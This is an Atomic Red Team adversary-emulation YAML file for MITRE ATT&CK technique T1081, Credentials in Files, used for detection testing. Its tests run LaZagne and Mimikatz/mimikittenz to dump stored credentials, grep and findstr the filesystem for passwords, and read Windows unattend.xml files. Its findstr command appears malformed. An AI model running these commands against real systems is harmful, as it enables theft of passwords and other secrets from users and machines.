atomic-red-team/atomics/T1081/T1081.yaml

---
attack_technique: T1081
display_name: Credentials in Files

atomic_tests:
- name: Extract Browser and System credentials with LaZagne
  description: |
    [LaZagne Source](https://github.com/AlessandroZ/LaZagne)

  supported_platforms:
    - macos

  executor:
    name: sh
    command: |
      python2 laZagne.py all

- name: Extract passwords with grep
  description: |
    Extracting credentials from files
  input_arguments:
    file_path:
      description: Path to search
      type: String
      default: /
  supported_platforms:
    - macos
    - linux
  executor:
    name: sh
    command: |
      grep -ri password #{file_path}

- name: Runs Mimikatz & Mimikittenz by name
  description: |
    Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
  supported_platforms:
    - windows
  executor:
    name: powershell
    elevation_required: true
    command: |
      invoke-mimikittenz
      mimikatz.exe

- name: Extracting passwords with findstr
  description: |
    Extracting Credentials from Files
  supported_platforms:
    - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      findstr /si pass *.xml | *.doc | *.txt | *.xls
      ls -R | select-string -Pattern password
      
- name: Access "unattend.xml"
  description: |
    Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
   
  supported_platforms:
    - windows
  executor:
    name: command_prompt
    elevation_required: true
    command: |
      cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
      cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1